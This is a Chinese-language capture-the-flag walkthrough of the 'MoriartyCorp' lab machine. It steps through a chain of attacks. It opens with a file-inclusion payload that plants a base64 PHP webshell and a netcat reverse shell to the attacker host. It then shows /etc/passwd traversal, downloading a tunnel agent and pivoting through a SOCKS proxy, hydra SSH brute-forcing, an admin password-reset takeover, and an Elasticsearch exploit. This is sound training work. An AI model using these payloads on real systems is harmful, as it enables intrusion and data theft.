第三次打靶
靶机介绍1)靶机名称:3-Free-MoriartyCorp
2)难度级别:中-高
3)靶机背景介绍:
①你作为一名特工,协助调查世界最大军火商的非法交易
②本次靶机共有6个任务,每完成一个任务并提交flag,则解锁下一个任务
③8000端口用于提交flag和提示下一关信息,不得对8000端口展开攻击
④靶场环境基于Docker容器打造
⑤美观的flag都以#_flag.txt格式存在于目标系统中
⑥flag提交方式为flag{}
4)课程来源:https://www.aqniukt.com/goods/show/2434?targetId=16289&preview=0
5)靶机地址:链接:https://pan.baidu.com/s/1digsxLOoLd0LoQjrp4OZ8g提取码:yk91
打靶过程:
1)因靶机通过仅主机方式与宿主机连接,因此可通过二层地址发现的方式,找到靶机的IP地址
#arp-scan -l 192.168.56.0/24https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124225850361-1385996447.png
2)对靶机进行全端口扫描
# nmap -p- 192.168.56.106https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124225907523-1486541801.png
3)通过靶机提示,方式IP:8000端口对应的web页面
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124225931229-769744362.png
4)通过上述页面提示,复制页面flag{start}开启靶机,开启第一个任务
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124225949234-105856941.png
5)通过上述页面提示,可以发现该靶机对公网开放了一个80端口,此时对80端口进行扫描
# nmap -p80 192.168.56.106https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124230009239-379705950.png
由此可以得出,靶机的处理方法:提交一个flag,就会开启下一关的任务
6)通过IP:80访问WEB页面,通过观察页面直接发现不了任何信息
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124230120320-798588048.png
7)通过点击Blog post 1或者Blog post 1,发现URL出现了变化
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124230134776-1248463519.png
8)通过URL发现,该页面可能存在文件包含漏洞,对其进行 基本测试
http://192.168.56.106/?file=../../../../etc/passwdhttps://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124230150218-1367193192.png
通过测试发现,确实存在文件包含漏洞
9)对文件包含漏洞进行利用:加载自己的webshell,进行漏洞的反弹,在kali主机上获取一个反弹的shell
浏览器:
http://192.168.56.106/?file=data:/text/plain;base64,PD9waHAgJHZhcj1zaGVsbF9leGVjKCRfR0VUWydjbWQnXSk7IGVjaG8gJHZhciA/Pg==&cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.56.103+1337+>/tmp/f
kali主机:
nc -lvvp 1337https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124230226889-1426052932.png
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124230243706-1897535563.png
10)通过反弹shell,输入命令,查看到在根用户下存在第一个flag文件
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124230308325-906077901.png
11)将获取到的flag,提交至IP:8000端口中,解锁一下任务
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124230328475-2090981225.png
12)按照页面提示信息,下一任务是为了攻击该企业的内部网络,且内部网络地址范围为172.17.0.3-254
注:因为是内网地址段,所以通过kaLi无法直接访问到内网主机,此时可通过隧道代理的技术手段穿透内网,使得可以在kali主机上直接访问内容,此处使用Venom隧道连接工具
下载地址:https://github.com/Dliv3/Venom/releases
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124230342755-2038132897.png
13)通过前期信息搜集发现目标主机是Linux主机,所以把针对Linux系统的代理客户端程序传输到目标服务器上,然后利用客户端程序与目标系统建立一条隧道,从而穿透内网,先Kali主机搭建web服务,将客户端程序下载至目标服务器
# cp agent_linux_x64 /var/www/html
# systemctl restart apache2https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124230404685-656114923.png
14)通过第十步反弹的webshell,下载客户端程序
$ wget http://192.168.56.103/agent_linux_x64https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124230423355-31944430.png
15)在kali主机启动隧道的服务端程序(监听9999端口)
# ./admin_linux_x64 -lport 9999https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124230440329-1748862456.png
16)启动客户端程序,同时指定服务器端的Ip地址,kali服务器端的监听端口
$ chmod +x agent_linux_x64
$ ./agent_linux_x64 -rhost 192.168.56.103 -rport 9999https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124230455405-854721266.png
此时服务器显示连接成功
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124230512821-1492876835.png
17)在服务器端,输入shouw命令,发现第一跳节点已出现,然后进入节点1,开启一个本地的sockes监听端口1080,这样就在kali服务端又开启一个监听端口
>>> show
>>> goto 1
>>> socks 1080https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124230528439-288965214.png
18)上述步骤完成后,在kali主机配置proxychains,利用proxychains的代理功能,让kali上的所有工具都可以利用代理去穿透目标系统的内网(在最后一行修改代理服务器的IP地址)
# vi /etc/proxychains4.conf
最后一行编辑:socks5 127.0.0.1 1080
注释DNS代理:#proxy_dnshttps://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124230547363-1337187198.png
19)配置完成后,就可以挂着proxychains去扫描目标系统的内网,此处使用nmap扫描目标系统的内网网段的常用端口
# proxychains nmap 172.17.0.3-254 -p80,22,44https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124230610423-2124852830.png
20)通过上述扫描发现开放了172.17.0.4:80,对其进行访问,访问时需要在浏览器配置代理
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124230633588-1200745714.png
访问出现如下界面
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124230653589-757301891.png
21)在上述页面中,可以上传文件,但是上传文件时,需要输入密码,此时通过busuit对其进行暴力破解。问题:当浏览器把代理指向Burp后,浏览器就失去了穿透内网的能力,因为要访问内网,必须要挂之前建立前的隧道代理(socks代理),为解决该问题,需要在burp中配置二级代理
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124230724912-1203362149.png
配置完成后,访问网页时,先通过burp代理,再通过socks代理
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124230745071-2097861591.png
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124230758825-297373087.png
22)此时可正常访问,上传webshell文件,并进行提交,提交时通过Burp抓包
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124230813637-2144745221.png
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124230840556-480968476.png
23)对密码进行暴力破解,破解出密码为password,同时可以查看到上传的目录
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124230859470-1859372481.png
http://172.17.0.4/photo/22/shell.php
24)通过中国蚁剑进行webshell连接,需要先设置中国蚁剑的代理为socks代理,保存后,添加上述连接,连接至服务器后,即可获取到flag
蚁剑加载器:https://github.com/AntSwordProject/AntSword-Loader
蚁剑源码:https://gitcode.net/mirrors/antswordproject/antsword?utm_source=csdn_github_accelerator
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124230945597-646827428.png
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124231006566-1659015979.png
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124231020029-1891677920.png
25)将flag在IP:8000处进行提交,进入下一个任务,根据任务提示,页面告诉我们已经有一名特工已经进入目标服务器中,且在目标服务中发现了一些账号和密码,同时提示我们,目标系统上有一个SSH的server,可利用上述用户和密码登录至服务器中,但是目标ssh服务器的IP地址需要自己发现:现在内网中发现开启了22端口的主机172.17.0.5
#nmap -p22 -ST -Pn 172.17.0.3-254https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124231036035-1014819227.png
26)形成用户名和密码文件
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124231054417-1410744185.png
27)通过hydra进行暴力破解
# proxychains hydra -L users.txt -P password.txt ssh://172.17.0.5https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124231109315-797478331.png
28)通过ssh用户名和密码登录目标服务器后,查看到flag
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124231124440-1776199306.png
flag{what_weapons}
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124231136713-418190266.png
29)通过上述提示可知某个主机没有开放80端口,但是开放了443,8000,8080,8888中的某个端口,继续通过扫描发现
#proxychains nmap -p443,8000,8080,8888 -sT -Pn 172.17.0.3-254https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124231152416-203488263.png
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124231210595-517276547.png
30)通过访问发现是一个类似聊天室的页面,输入上述提示中的用户名和密码
http://172.17.0.6:8000https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124231240334-904149905.png
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124231257071-1680107155.png
31)点击上面chat按钮,发现了admin用户和buyer13的聊天记录
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124231313253-145393985.png
32)点击修改密码操作,发现此处存在任意密码修改漏洞,可以直接修改管理员密码:抓取数据包后,修改用户名为admin,修改admin用户名密码为123
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124231328472-1517928290.png
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124231342888-552156031.png
33)重新访问网页,输入修改后的用户名和密码,在聊天室中发现了flag
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124231410251-1903157676.png
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124231422988-641742923.png
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124231436607-2005979783.png
34)通过上述提示发现,存在一个elasticsearch的服务器,因此对9200端口进行扫描
#proxychains nmap -p9200 -sT -Pn 172.17.0.3-20https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124231451887-462690531.png
35)通过浏览器进行访问,elasticsearch的版本
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124231508459-1684669880.png
36)通过kali搜索elasticsearch的可能利用的漏洞
# searchsploit elasticsearchhttps://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124231524081-782137295.png
37)利用代码,获取falg
# proxychains python2 /usr/share/exploitdb/exploits/linux/remote/36337 172.17.0.7https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124231546808-805177250.png
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
页:
[1]